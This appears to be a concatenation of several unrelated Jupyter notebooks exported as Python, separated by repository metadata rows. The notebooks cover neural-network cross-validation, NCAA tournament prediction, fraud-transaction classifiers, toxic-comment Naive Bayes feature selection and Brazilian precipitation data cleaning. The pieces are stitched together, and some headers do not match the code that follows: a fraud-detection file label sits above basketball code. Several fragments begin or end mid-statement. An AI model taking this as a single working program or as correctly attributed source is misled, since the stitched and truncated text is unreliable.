skf = StratifiedKFold(n_splits=5, random_state=12)
avg_loss = []
avg_acc = []

# Loop through the indices the split() method returns
for index, (train_index, test_index) in enumerate(skf.split(all_data, labels)):
    print("Training on fold " + str(index + 1) + "/5.............................................")
    # Generate batches from indices
    x_train, x_test = all_data[train_index], all_data[test_index]
    # use one-hot vectors as labels
    y_train, y_test = labels[train_index], labels[test_index]
    y_train = np_utils.to_categorical(y_train)
    y_test = np_utils.to_categorical(y_test)
    # NOTE(review): the model is NOT re-initialized per fold (the rebuild
    # code below is commented out), so `network` keeps its weights across
    # folds and each fold's test split may include data it was trained on
    # earlier — the CV score is optimistic. Confirm whether intentional.
    # network = models.Sequential()
    # network.add(layers.Dense(16, input_shape=(8,)))
    # network.add(layers.Dense(32, activation="relu"))
    # network.add(layers.Dense(64, activation="relu"))
    # network.add(layers.Dense(32, activation="relu"))
    # network.add(layers.Dense(16, activation="sigmoid"))
    # network.add(layers.Dense(1, activation='sigmoid'))
    # # Adam = Adam(lr=0.05)
    # network.compile(optimizer=Adam(lr=0.00038),
    #                 loss='binary_crossentropy',
    #                 metrics=['acc'])
    # network.summary()
    history = network.fit(x_train, y_train,
                          epochs=50, verbose=1, batch_size=2)
    loss, accuracy = network.evaluate(x_test, y_test)
    # evaluate and store the accuracy
    # loss, accuracy = model.evaluate(xtest_imagelist, ytest, verbose=1)
    avg_loss.append(loss)
    avg_acc.append(accuracy)

# cross validation score
print("Average accuracy of model on the dev set = ", np.mean(avg_acc))
# -
# Rebuild the raw (unscaled) feature matrix and sanity-check the scaler
# round-trip on the first record.
# Vectorized column selection replaces the original row-by-row fill into a
# pre-allocated *integer* buffer, which silently truncated float values.
my_data = dataDF[['delta', 'theta', 'alphaLow', 'alphaHigh',
                  'betaLow', 'betaHigh', 'gammaLow', 'gammaMid']].values
my_data[0]
d = scaler.transform(my_data)
d[0]
dataDF
| 23,427 |
/Fraudulent_Transaction_Detection.ipynb
|
2bac75c7815ab583c2d4eab573ecd891f99e727f
|
[] |
no_license
|
amanrajdce/Fraud-Detector
|
https://github.com/amanrajdce/Fraud-Detector
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 251,460 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import pandas as pd
from pandas import DataFrame
import numpy as np
import sklearn
from sklearn.model_selection import train_test_split
from sklearn import tree
from sklearn.tree import DecisionTreeClassifier
from sklearn.tree import export_graphviz
from io import StringIO
import pydotplus
from IPython.display import Image
from sklearn.model_selection import GridSearchCV
from sklearn.metrics import roc_auc_score
# +
## Data Cleaning & Preparation
# -
df = pd.read_csv("NCAA_Tourney_2002_2019_update.csv")
df_clean = df.copy()
df_clean.head(3)

# +
# %matplotlib inline
import matplotlib.pyplot as plt
plt.style.use('ggplot')
from math import sin, cos, sqrt, atan2, radians
import numpy as np
import pandas as pd
import random
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import (auc, classification_report, roc_auc_score, accuracy_score,
                             f1_score, log_loss, roc_curve, confusion_matrix, precision_score, recall_score)
from sklearn.preprocessing import StandardScaler
import statsmodels.api as sm

# Per-game point spread from team1's perspective, plus the mirror for team2.
df_cut = df[[ "team1_teamname", "team1_score", "team2_teamname","team2_score"]]
df_cut["team1_spead"] = df_cut["team1_score"] - df_cut["team2_score"]
df_cut["team2_spead"] = -df_cut["team1_spead"]
df_cut.tail()

# Stack both perspectives into one long (team, spread, opponent) table so
# each game contributes one row per side.
teams = pd.concat([
    df_cut[['team1_teamname', 'team1_spead','team2_teamname']].rename(columns={'team1_teamname': 'team', 'team1_spead': 'spread', 'team2_teamname': 'opponent'}),
    df_cut[['team2_teamname', 'team2_spead','team1_teamname']].rename(columns={'team2_teamname': 'team', 'team2_spead': 'spread', 'team1_teamname': 'opponent'})
])
teams.tail()

import numpy as np
# Cap blowouts at +/-15 points so outliers don't dominate the ratings.
teams['spread'] = np.where(teams['spread'] > 15, 15, teams['spread'])
teams['spread'] = np.where(teams['spread'] < -15, -15, teams['spread'])
# Average (capped) spread per team.
spreads = teams.groupby('team').spread.mean()
spreads
# Simple Rating System (SRS): solve the linear system
#   rating_i - mean(rating of i's opponents) = average spread_i
# with one equation (row) per team.
terms = []
solutions = []
for team in spreads.keys():
    row = []
    # get a list of team opponents
    opps = list(teams[teams['team'] == team]['opponent'])
    for opp in spreads.keys():
        if opp == team:
            # coefficient for the team should be 1
            row.append(1)
        elif opp in opps:
            # coefficient for opponents should be 1 over the number of opponents
            row.append(-1.0/len(opps))
        else:
            # teams not faced get a coefficient of 0
            row.append(0)
    terms.append(row)
    # average game spread on the other side of the equation
    solutions.append(spreads[team])

# Solve for one rating per team.
solutions = np.linalg.solve(np.array(terms), np.array(solutions))
ratings = list(zip( spreads.keys(), solutions ))
srs = pd.DataFrame(ratings, columns=['team', 'rating'])
srs.head()

rankings = srs.sort_values('rating', ascending=False).reset_index()[['team', 'rating']]
rankings.loc[:10]
# Attach each game's team ratings and bucket the rating gap into {-1, 0, +1}.
team_list = list(rankings['team'])
rating_list = list(rankings['rating'])

# Map team name -> rating once. The original rebuilt a pd.Index and called
# get_loc inside a per-game loop (twice, once per team column); a single
# dict lookup is equivalent (team names are unique groupby keys) and O(1).
rating_by_team = dict(zip(team_list, rating_list))
team1_rating = [rating_by_team[name] for name in df['team1_teamname']]
team2_rating = [rating_by_team[name] for name in df['team2_teamname']]

# Per-game rating difference, team1 minus team2.
rating_diff = [r1 - r2 for r1, r2 in zip(team1_rating, team2_rating)]

# Discretize: +1 if team1 is more than 2 points better, -1 if more than
# 2 points worse, else 0.
rating_compare = []
for gap in rating_diff:
    if gap > 2:
        rating_compare.append(1)
    elif gap < -2:
        rating_compare.append(-1)
    else:
        rating_compare.append(0)

df['rating_diff'] = rating_compare
df['rating_diff'].value_counts()
def distance(lat1, lon1, lat2, lon2):
    """Great-circle distance in km between two lat/lon points (haversine)."""
    # approximate radius of earth in km
    earth_radius_km = 6373.0
    phi1, lam1, phi2, lam2 = (radians(v) for v in (lat1, lon1, lat2, lon2))
    # haversine of the central angle between the two points
    half_chord = sin((phi2 - phi1) / 2)**2 + cos(phi1) * cos(phi2) * sin((lam2 - lam1) / 2)**2
    central_angle = 2 * atan2(sqrt(half_chord), sqrt(1 - half_chord))
    return earth_radius_km * central_angle
# Travel-distance features: how far each team traveled to the host site,
# and the difference (team1 minus team2).
df['dist1'] = df.apply(lambda row: distance(row['host_lat'], row['host_long'], row['team1_lat'], row['team1_long']), axis=1)
df['dist2'] = df.apply(lambda row: distance(row['host_lat'], row['host_long'], row['team2_lat'], row['team2_long']), axis=1)
df['diff_dist'] = df['dist1'] - df['dist2']

# Pythagorean expected win % from adjusted offensive/defensive efficiency
# (11.5 is the exponent conventionally used for college basketball).
df['exp_win1'] = (df['team1_adjoe']**11.5)/ ((df['team1_adjde']**11.5)+(df['team1_adjoe']**11.5))
df['exp_win2'] = (df['team2_adjoe']**11.5)/ ((df['team2_adjde']**11.5)+(df['team2_adjoe']**11.5))

#Log 5 is a formula invented by Bill James[1] to estimate the probability that team A will win a game, based on the true winning percentage of Team A and Team B.
df['team1_log5'] = (df['exp_win1'] - (df['exp_win1']*df['exp_win2']))/ (df['exp_win1']+df['exp_win2']-(2*df['exp_win1']*df['exp_win2']))

# Seed gap bucketed into {-1, 0, +1} at a 4-seed threshold.
seed_diff = list(df['team1_seed'] - df['team2_seed'])
seed_compare = []
for i in seed_diff:
    if i >= 4:
        seed_compare.append(1)
    elif i <= -4:
        seed_compare.append(-1)
    else:
        seed_compare.append(0)
df['seed_diff'] = seed_compare
df['seed_diff'].value_counts()

# Binary target: 1 if team1 won the game.
df['team1_win'] = (df['team1_score']>df['team2_score']).astype(int)
def tran(x):
    """Indicator transform: map any non-zero value to 1 and zero to 0."""
    return 0 if x == 0 else 1
# Final Four indicator features: 1 if the team has any Final Four history,
# else 0; the difference lands in {-1, 0, 1}.
df['team1_ff'] = df['team1_pt_overall_ff'].apply(tran)
df['team2_ff'] = df['team2_pt_overall_ff'].apply(tran)
df['ff_diff'] = df['team1_ff'] - df['team2_ff']
df['ff_diff'].value_counts()

# Fix the RNG so the random half-split below is reproducible.
np.random.seed(0)
def shuffle(df):
    """Return a row-shuffled copy of `df` with a fresh 0..n-1 index."""
    permuted = df.reindex(np.random.permutation(df.index)).copy()
    return permuted.reset_index(drop=True)
# Randomly flip the team1/team2 perspective for half of the games so the
# model can't learn a positional bias from which team is listed first.
random_indices = random.sample(range(len(df)), int(len(df)/2))
df_1 = df[~df.index.isin(random_indices)][['game_id','season','team1_win','exp_win1','exp_win2','team2_score', 'team1_score','diff_dist','team1_log5','team1_id','team2_id','seed_diff', 'ff_diff','rating_diff']].reset_index(drop=True)
df_2 = df[df.index.isin(random_indices)][['game_id','season','team1_win','exp_win1','exp_win2','team2_score','team1_score','diff_dist','team1_log5','team1_id','team2_id','seed_diff', 'ff_diff','rating_diff']].reset_index(drop=True)

# BUGFIX: the original derived the flipped columns from the full `df`.
# Because df_2 was re-indexed with reset_index(drop=True), pandas silently
# aligned df_2 row i with df row i — a *different* game — corrupting the
# flipped half. All flips now use df_2's own columns.
df_2['team1_win'] = df_2['team1_win'].apply(lambda x: 1 if x==0 else 0)
df_2['diff_dist'] = df_2['diff_dist']*-1
df_2['ff_diff'] = df_2['ff_diff']*-1
df_2['seed_diff'] = df_2['seed_diff']*-1
df_2['rating_diff'] = df_2['rating_diff']*-1
# log5 from the flipped perspective (team2 becomes the reference team)
df_2['team1_log5'] = (df_2['exp_win2'] - (df_2['exp_win1']*df_2['exp_win2']))/ (df_2['exp_win1']+df_2['exp_win2']-(2*df_2['exp_win1']*df_2['exp_win2']))

# Relabel the flipped frame so "team1" columns again describe the reference
# team (swaps the exp_win, score and id column names).
df_2.columns = ['game_id', 'season', 'team1_win', 'exp_win2', 'exp_win1', 'team1_score', 'team2_score', 'diff_dist', 'team1_log5',
                'team2_id', 'team1_id','seed_diff', 'ff_diff','rating_diff']
df_2['team1_win'].value_counts()
df_1['team1_win'].value_counts()

# Recombine, then hold out the 2019 season for testing.
mm_train = pd.concat([df_2, df_1])
mm_data_2019 = mm_train[mm_train['season'] == 2019].reset_index(drop=True)
mm_data_else = mm_train[mm_train['season'] != 2019].reset_index(drop=True)
# -
# 2019 season is the hold-out test set; all earlier seasons train the model.
y_test = mm_data_2019['team1_win']
x_test = mm_data_2019[['ff_diff','seed_diff','diff_dist','team1_log5','rating_diff']]
y_train = mm_data_else['team1_win']
x_train = mm_data_else[['ff_diff','seed_diff','diff_dist','team1_log5','rating_diff']]
y = y_train
X = x_train
def summary_tree(model_object):
    """Render a fitted sklearn decision tree to 'tree.png' via graphviz and
    return the output file name.

    Uses the module-level feature matrix X for column names and assumes a
    binary {0, 1} target.
    """
    dot_data = StringIO()
    export_graphviz(model_object, out_file=dot_data, filled=True,
                    rounded=True, special_characters=True, feature_names=X.columns.values,
                    class_names=['0', '1'])
    graph = pydotplus.graph_from_dot_data(dot_data.getvalue())
    output_imagefile = 'tree.png'
    graph.write_png(output_imagefile)
    return output_imagefile
# +
# Tune the tree depth with 5-fold CV over depths 1..100, scored by ROC AUC.
# Depth level of the Classification Tree
kfolds = 5
maximum_depth = 100
minimum_depth = 1
param_grid = {'max_depth':list(range(minimum_depth, maximum_depth+1))}
# -
gridsearch = GridSearchCV(DecisionTreeClassifier(criterion='entropy', random_state=1), param_grid, scoring='roc_auc', cv=kfolds, n_jobs=-1)
gridsearch.fit(X,y)
# best pruned tree ("BPT") found by the grid search
clf_BPT = gridsearch.best_estimator_
Image(summary_tree(clf_BPT))
print(clf_BPT.get_depth())

# Evaluate the best tree on the 2019 hold-out: ROC AUC and log loss.
y_test_actual = mm_data_2019['team1_win']
X_test = mm_data_2019[['ff_diff','seed_diff','diff_dist','team1_log5','rating_diff']]
from sklearn.metrics import roc_auc_score
print(roc_auc_score(y_test_actual, clf_BPT.predict_proba(X_test)[:,1]))
predict_proba = clf_BPT.predict_proba(X_test)
log_loss(y_test, predict_proba)
# +
def get_treepaths(dtc, df):
    """Print the decision path (rules, sample count, class counts, class)
    for every leaf of a fitted DecisionTreeClassifier `dtc`.

    NOTE(review): split-feature indices are resolved against `df.columns`,
    so `df` must have exactly the columns the tree was trained on (here the
    tree was fit on the 5-column X, while mm_data_2019 has more columns) —
    verify the printed rule names before trusting them.
    """
    rules_list = []
    values_path = []
    # per-node class-count arrays from the fitted tree
    values = dtc.tree_.value

    def RevTraverseTree(tree, node, rules, pathValues):
        # Walk from `node` up to the root, recording the rule and the
        # class-count value at each ancestor.
        try:
            prevnode = tree[2].index(node)
            leftright = '<='
            pathValues.append(values[prevnode])
        except ValueError:
            # failed, so find it as a right node - if this also causes an exception, something's really f'd up
            prevnode = tree[3].index(node)
            leftright = '>'
            pathValues.append(values[prevnode])
        # now let's get the rule that caused prevnode to -> node
        p1 = df.columns[tree[0][prevnode]]
        p2 = tree[1][prevnode]
        rules.append(str(p1) + ' ' + leftright + ' ' + str(p2))
        # if we've not yet reached the top, go up the tree one more step
        if prevnode != 0:
            RevTraverseTree(tree, prevnode, rules, pathValues)

    # get the nodes which are leaves
    leaves = dtc.tree_.children_left == -1
    leaves = np.arange(0,dtc.tree_.node_count)[leaves]
    # build a simpler tree as a nested list: [split feature, split threshold, left node, right node]
    thistree = [dtc.tree_.feature.tolist()]
    thistree.append(dtc.tree_.threshold.tolist())
    thistree.append(dtc.tree_.children_left.tolist())
    thistree.append(dtc.tree_.children_right.tolist())
    # get the decision rules for each leaf node & apply them
    for (ind,nod) in enumerate(leaves):
        # get the decision rules
        rules = []
        pathValues = []
        RevTraverseTree(thistree, nod, rules, pathValues)
        pathValues.insert(0, values[nod])
        # reverse so the path reads root -> leaf
        pathValues = list(reversed(pathValues))
        rules = list(reversed(rules))
        rules_list.append(rules)
        values_path.append(pathValues)

    # pretty-print one section per leaf
    for i in range(len(rules_list)):
        print('\nLeaf node ID =', i+1)
        print('Path =', rules_list[i])
        distro = sum(values_path[i][-1])
        print('sample =', int(sum(distro)))
        print('value =', list([int(distro[0]), int(distro[1])]))
        predicted_class = 1 if distro[1] > distro[0] else 0
        print('class = ', predicted_class)
    return None

get_treepaths(dtc=clf_BPT, df= mm_data_2019)
# -
el("Time of the day (0-23)")
plt.ylabel("Number of Frauds")
plt.show()
# Since all the 24 bins corresponding to the 24 hours seem to have almost the same number of entries, it seems unlikely that step_bin will be useful in detecting frauds. Hence, we drop this column
X.drop(['step', 'step_bin'], axis=1, inplace=True)

# ### Final X before feature engineering
X.head()

# ### 4. Feature Engineering
# #### Checking if the accounts are balanced in origin and destination after the transaction can possibly be a good indicator of fraud.
# Balance-check errors: zero when the transaction amount fully explains the
# before/after balances on each side.
X['errorOrig'] = X['newBalanceOrig'] + X['amount'] - X['oldBalanceOrig']
X['errorDest'] = X['oldBalanceDest'] + X['amount'] - X['newBalanceDest']
print("Account not balanced in Orig:", len(X[X['errorOrig'] != 0])/ len(X))
print("Account not balanced in Dest:", len(X[X['errorDest'] != 0])/ len(X))

# Since a significant proportion of accounts are not balanced, it makes sense to use them as new features
plt.figure()
plt.title("Correlation among different features before modelling")
corelation = round(X.corr(), 2)
sns.heatmap(corelation, center=0, linewidths=.1, linecolor='white', cmap="YlGnBu", annot=True)
plt.show()

# ### 5. Model Selection
# #### Preparing the dataset
# Separate the target column from the features.
y = X['isFraud']
X.drop(['isFraud'], axis=1, inplace=True)
print("Size of dataset:{}".format(len(X)))

# #### Train, Test Split and Normalizing the dataset
# Fit the scaler on the training split only to avoid test-set leakage.
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
scaler = StandardScaler().fit(X_train)
X_train_norm = scaler.transform(X_train)
X_test_norm = scaler.transform(X_test)
def calculate_metrics(clf, Xtest, Ytest):
    """Report how `clf` performs on the held-out set.

    Prints the per-class classification report and a one-line summary, then
    returns the (accuracy, average precision score) pair.
    """
    predicted = clf.predict(Xtest)
    print(classification_report(Ytest, predicted))
    accuracy = clf.score(Xtest, Ytest)
    avg_precision = average_precision_score(Ytest, predicted)
    print("Accuracy:{}, Average Precision Score:{}".format(accuracy, avg_precision))
    return accuracy, avg_precision
# #### Using a dummy classifier to set a baseline
# We use accuracy and average precision rate as performance metrics. Accuracy is not reliable in this case as we have a very skewed data set. So alternate metrics like AUC curve, average precision rate, etc are used.
dummy_clf = DummyClassifier().fit(X_train_norm, y_train)
dc_acc, dc_aps = calculate_metrics(dummy_clf, X_test_norm, y_test)

# Clearly, even a dummy classifier can have a very high accuracy but negligible average precision score.
# To begin with, we start with a very basic classifier
#
# ### Gaussian Naive Bayes Classifier
nb = GaussianNB().fit(X_train_norm, y_train)
nb_acc, nb_aps = calculate_metrics(nb, X_test_norm, y_test)

# With Naive Bayes' we get a slight improvement in average precision, however, accuracy goes down. Clearly Gaussian assumption for the data is not valid.
# ### Logistic Regression Classifier
lr = LogisticRegressionCV(cv=5, random_state=0).fit(X_train_norm, y_train)
lr_acc, lr_aps = calculate_metrics(lr, X_test_norm, y_test)

# Logistic Regression is quite good for binary classification. In this case, it gives both better accuracy and average precision than both Dummy and Naive Bayes' classifier
# ### XG Boost
# Tree-based models below are fit on the unscaled features (scaling is
# unnecessary for trees).
xgb = XGBClassifier().fit(X_train, y_train)
xgb_acc, xgb_aps = calculate_metrics(xgb, X_test, y_test)

# ### Random Forest Classifier
rf = RandomForestClassifier(n_estimators=10).fit(X_train, y_train)
rf_acc, rf_aps = calculate_metrics(rf, X_test, y_test)

# ### LDA
lda = LinearDiscriminantAnalysis().fit(X_train_norm, y_train)
lda_acc, lda_aps = calculate_metrics(lda, X_test_norm, y_test)

# +
# Horizontal bar chart comparing average precision across all classifiers.
plt.rcdefaults()
fig, ax = plt.subplots()

# Classifier names
clas = ('Dummy', 'Gaussian NB', 'LDA', 'Logistic Regression', 'XGBoost', 'Random Forest')
performance = [dc_aps, nb_aps, lda_aps, lr_aps, xgb_aps, rf_aps]
y_pos = np.arange(len(clas))

ax.barh(y_pos, performance, align='center',
        color='green')
ax.set_yticks(y_pos)
ax.set_yticklabels(clas)
ax.invert_yaxis()
ax.set_xlabel('Average Precision Score')
ax.set_title('Average precision score for all classifiers')
plt.show()
# -
| 15,061 |
/Precipitacao.ipynb
|
2740947ed35c749c47603adc5f6406253bf2ce89
|
[] |
no_license
|
Puppim/Data-Science
|
https://github.com/Puppim/Data-Science
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 555,822 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# #### Improving M000 (log loss: 0.320) by changing MultinomialNB hyperparameters / vectorization
# +
import sys
sys.path.append('..')
from __future__ import division, print_function
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer, TfidfTransformer
from sklearn.naive_bayes import BernoulliNB, MultinomialNB
from sklearn.multiclass import OneVsRestClassifier
from sklearn.feature_selection import chi2, mutual_info_classif, SelectKBest
from sklearn.model_selection import cross_val_score
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import binarize
from sklearn.metrics import log_loss
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from collections import defaultdict
# %matplotlib inline
# %load_ext autoreload
# %autoreload 2
from evaluation import cross_validate_multilabel, multilabel_results
# -
# Define classes and load test/train data, some input text is "N/A" so turn na_filter off to prevent this being converted to NaN
# +
# The six toxicity labels; Y is an (n_samples, 6) 0/1 label matrix.
toxic_classes = [
    'toxic', 'severe_toxic', 'obscene',
    'threat', 'insult', 'identity_hate'
]

df = pd.read_csv('../data/train.csv', na_filter=False)
X_text = df['comment_text'].values
Y = df[toxic_classes].values
ids = df['id']
# -
# ### [1] Feature reduction
# To improve our model accuracy we will first try reducing the number of features.
#
# Each feature is a single token (word) found within the training data, the feature value is the count of that token within the document record, i.e. how many times a word appeared in a particular comment
#
# The majority of these words will not be useful in making predictions, and whilst these non-discriminative features should affect each class equally, their inclusion can still result in negative performance.
#
# #### [1a] Drop low frequency tokens
# First we will remove words that only appear in a small number of documents, as their class conditional probabilities will be less reliable.
#
# Plotting histogram showing the token frequency distribution (x-axis: number of documents that token appears in, y-axis: number of tokens with given document frequency)
# Binarize token counts so each column's sum is that token's document
# frequency, then plot the (log-scaled) distribution of those frequencies.
X = CountVectorizer(binary=True).fit_transform(X_text) # binarize features for easy histogram
document_frequency = np.asarray(X.sum(axis=0)).flatten()
plt.hist(document_frequency, bins=1000)
plt.yscale('log')
plt.show()
# It is quite clear that the mast majority of features only appear in a small number of documents (~1) so we will model performance when setting a minimum document frequency (expressed as an integer document count).
# +
# Sweep the min_df cut-off: drop tokens appearing in fewer than min_df
# documents, then cross-validate a one-vs-rest MultinomialNB at each level.
results = []
min_dfs = [1, 10, 100, 1000, 5000, 10000, 20000, 30000, 40000, 50000, 60000]
for min_df in min_dfs:
    cvec = CountVectorizer(min_df=min_df)
    X = cvec.fit_transform(X_text)
    cv_scores = cross_validate_multilabel(MultinomialNB(), X, Y, cv=10, scoring='neg_log_loss')
    results.append(list(cv_scores))
    print('min_df:', min_df, '|', 'number of features:', len(cvec.vocabulary_))

multilabel_results(results, toxic_classes, min_dfs)
# -
# Suprisingly, our best result comes from the model which has features with a minumum document frequent of 60,000. In this model we only have one feature...
# Inspect the degenerate min_df=60000 model: only one token survives.
cvec = CountVectorizer(min_df=60000)
X = cvec.fit_transform(X_text)
cvec.vocabulary_

# The token 'the' is unlikely to discriminate between classes, as it is so common. The most likely explanation here is that we are simply getting a "null" model which has a probability equal to the class prior: the likelihood of observing an example in a class (class marginal probability)
#
# In other words for models with only very frequent, in the Bayes numerator `P(x|y)P(y)` then `P(x|y)` will be `~P(x)` (essentially independant of class) and the so `P(y)` will become the dominant term.
#
# Our single feature model goes one step further and `P(x|y)` = 1 for both classes (sum of feature / sum of all features = 1) and so we should get a constant probability for all records (equal to the class prior)
# Sanity check: with one always-on feature the predicted probability is the
# same for every record (min == max).
mnb = MultinomialNB()
mnb.fit(X, Y[:, 0])
probs = mnb.predict_proba(X)[:,1]
probs.min() == probs.max()

# Checking the proportion of records which have each class attribute
Y.sum(axis=0) / Y.shape[0]
# So we are dealing with very imbalanced classes, and in our class specific (one vs rest) models the class prior for the negative case will always dominate. We are essentially just prediction "not toxic"" for every record and getting the best result because "not toxic" and getting a *good* result because that is the most likely class.
#
# This model be our new baseline (log_loss: **0.141**)
# #### [1b] Select "best" features
#
# Rather than dropping features which have a low rate of occurence, we will try to select the features which will best discriminate between classes prior to fitting the model.
#
# We use a chi2 test for independance which compares the joint probability `P(x|y)` with `P(x)` and ranks the features which have the highest different between the conditional and marginal probabilities.
#
# For example if:
# * `P('idiot')` = 0.1 and `P('idiot'|'toxic')` = 0.6
# * `P('dog')` = 0.01 and `P('idiot'|'toxic')` = 0.15<br>
#
# Then **idiot** will have a larger chi2 value.
#
# (The actual chi2 calculation actually considers an average across all combinations of `P('idiot'|'toxic'), P('idiot'|'not_toxic'), P('not_idiot'|'toxic'), P('not_idiot'|'not_toxic')`)
def kbest_feature_names(class_labels, kbest_per_class, cvec):
    """Return a DataFrame of the selected token names per class, ordered by
    ascending chi2 score.

    class_labels: one label per fitted selector.
    kbest_per_class: fitted SelectKBest objects (get_support / scores_).
    cvec: the fitted CountVectorizer the selectors were applied to.
    """
    # hoisted out of the loops: get_feature_names() is expensive and the
    # original called it once per selected token per class
    feature_names = cvec.get_feature_names()
    kbest_features = defaultdict(list)
    for toxic_class, kbest in zip(class_labels, kbest_per_class):
        indices = kbest.get_support(indices=True)
        scores = kbest.scores_
        # BUGFIX: sort each selected index by its *own* score. The original
        # did sorted(zip(indices, scores)), pairing the j-th selected index
        # with scores_[j] — but scores_ covers ALL features, so the wrong
        # scores drove the ordering whenever k < n_features.
        for index in sorted(indices, key=lambda idx: scores[idx]):
            kbest_features[toxic_class].append(feature_names[index])
    return pd.DataFrame(kbest_features)
# Fit a vectorizer on all comments and pick the 15 highest-chi2 tokens per
# class, first on the full vocabulary...
cvec = CountVectorizer()
X = cvec.fit_transform(X_text)
kbest_per_class = [SelectKBest(chi2, k=15).fit(X, y) for y in Y.T]

# Before fitting any models here are the top features per class according to chi2 value
kbest_feature_names(toxic_classes, kbest_per_class, cvec)

# Most of these results seem logical and are tokens you would normally associate with toxic comments, however we are getting a few spurious results likely caused by low frequency tokens so we will rerun using a small cut-off for rare tokens.
# ...then again with rare tokens (min_df < 10) removed, since their chi2
# scores are unstable.
cvec = CountVectorizer(min_df=10)
X = cvec.fit_transform(X_text)
kbest_per_class = [SelectKBest(chi2, k=15).fit(X, y) for y in Y.T]
kbest_feature_names(toxic_classes, kbest_per_class, cvec)
# These results look more robust. Whilst we see some of the same tokens being the best feature for multiple classes, there does seem to be a general theme in most cases. For example most of the top features in "identity_hate" target ethnicity / orientation etc.
#
# Will now try fitting models with only k best features retained, note that chi2 will be calculated within the cross-validation folds to avoid information from the full set leaking into the model.
def kbest_pipeline(k, classifier):
    """Build a two-stage pipeline: chi2-based k-best feature selection
    followed by the supplied classifier."""
    steps = [
        ('kbest', SelectKBest(chi2, k=k)),
        ('classifier', classifier),
    ]
    return Pipeline(steps)
# +
# Cross-validate Multinomial Naive Bayes over a grid of k (number of
# chi2-selected features).  Selection happens inside each CV fold (via the
# pipeline) so no information from the full set leaks into the model.
results = []
kbest = [1,5,10,20,30,40,50,60,70,80,90,100]
cvec = CountVectorizer(min_df=10)
X = cvec.fit_transform(X_text)
for k in kbest:
    cv_scores = cross_validate_multilabel(kbest_pipeline(k, MultinomialNB()), X, Y, cv=10, scoring='neg_log_loss')
    results.append(list(cv_scores))
    print('kbest:', k)
# -
multilabel_results(results, toxic_classes, kbest)
# Whilst selecting top features gave us a minor improvement (k=30) the performance appears to still impacted by the class imbalance. This is most noticeable in the classes which have the smallest proportion of positive samples (e.g. identity hate) we are actually getting a worse result by adding token features to the model.
#
# This is because the class prior is most influential in these cases and will still achieve the best result by essentially assuming all cases are negative.
#
# Will try re-running the last test with uniform class priors, although will likely get a worse result as we assuming the marginal `P(yi)` = `P(not_yi)` (n.b. Using larger k values as we no longer have reliable prior)
# +
results = []
kbest = [50,100,200,300,500,750,1000]
cvec = CountVectorizer(min_df=10)
X = cvec.fit_transform(X_text)
for k in kbest:
cv_scores = cross_validate_multilabel(kbest_pipeline(k, MultinomialNB(fit_prior=False)), X, Y, cv=10, scoring='neg_log_loss')
results.append(list(cv_scores))
print('kbest:', k)
# -
multilabel_results(results, toxic_classes, kbest)
# As expected results are worse, to avoid this we need to find a way of making the class prior less influential, but not ignored completely.
#
# Will explore a different approach using a logistic regression from the a Kaggle kernel that achieved log_loss of 0.052 in notebooks d002 to see if we can identify the reason for the increased performance.
y=[dfdd['Data'].dt.year,dfdd['Data'].dt.month]).mean().sort_values(by="TempMinima")
# <a id='insight06'></a>
# ### Comportamento cíclico da média das features/ano
# Nota-se um compotamento cíclico apesar de haver variação na média dos anos
dfdd.loc[dfdd['Data'].dt.year == 2017].mean()
dfdd.loc[dfdd['Data'].dt.year == 2018].mean()
dfdd.loc[dfdd['Data'].dt.year == 2017].mean().plot(figsize=(20,12))
dfdd.loc[dfdd['Data'].dt.year == 2018].mean().plot(figsize=(20,12))
#
# # 2) Pré-processamento
#
#
# ## Dataset sem imputação de dados
#
# Para construir um dataset apenas com valores fornecidos utilizaremos a união dos dois dataset de dados_diarios.txt e dados_horarios.txt
# +
dfdd = pd.read_csv('dados_diarios_semcab.txt', sep=";")
dfdd.drop(['Unnamed: 11','Estacao'], inplace=True, axis=1) # limpeza de colunas sem informacao
dfdh = pd.read_csv("dados_horarios_semcab.txt", sep = ";")
dfdh.drop(['Unnamed: 9','Unnamed: 10'], inplace=True, axis=1) # limpeza da coluna sem informacao
dfdd.Data = pd.to_datetime(dfdd.Data)
dfdh.Data = pd.to_datetime(dfdh.Data)
dfmerge = pd.merge(dfdd,dfdh,how='inner', on=['Data','Hora'])
dfmerge.sort_values(by="Data")
dfmerge
# -
dfpre=dfmerge.dropna(subset=["Precipitacao"])
dfpre
dfpre.drop(['Hora','TempMaxima','Insolacao','Evaporacao Piche', 'Temp Comp Media','Umidade Relativa Media','Velocidade do Vento Media','Estacao'], inplace=True, axis=1)
dfpre
dfpre.to_csv("ddreais.csv") #salvando em ddreais.csv"
dfpre.Data = pd.to_datetime(dfpre.Data)
dfpre.dtypes
# ## Dataset com imputação dos valores ausentes
# Esse tipo de dataset com imputação apresenta um viés forte da estratégia de utilizada para para a imputação
# dos valores faltantes.
#
# Técnicas de utilização de aprendizagem de máquina para essa imputação não fazem sentido como mencionado, pois a própria classe de interese está faltante em 50% dos dados.
#
# Analisando o dataset dados_diarios_semcab.txt vemos um padrão que toda linha 2n+1 apresenta valor de "Precipitacao e TemMinima" e nas 2n os demais valores, com um merge dessas tuplas com valores de 00:00 e 12:00 teríamos um dataset sem tantos valores ausentes. Essa estratégia se baseia em considerar que não há variações climáticas bruscas de um dia para o outro.
#
# Outra estratégia é considerar que esses dados apresentam baixa variação em seus valores antecessor e sucessor, visto que, pelo desvio padrão e por apresentar um acréscimo e decréscimo sequencial utilizaremos a estratégia da interpolação para fugir da ideia de fazer um merge entre dois horários diferentes. Utilizaremos essa segunda estratégia de imputação.
dfdd = pd.read_csv('dados_diarios_semcab.txt', sep=";")
dfdd.drop(['Unnamed: 11','Estacao'], inplace=True, axis=1) # limpeza de colunas sem informacao
dfdd = dfdd.interpolate(method='linear', limit_direction='forward', axis=0)
dfdd
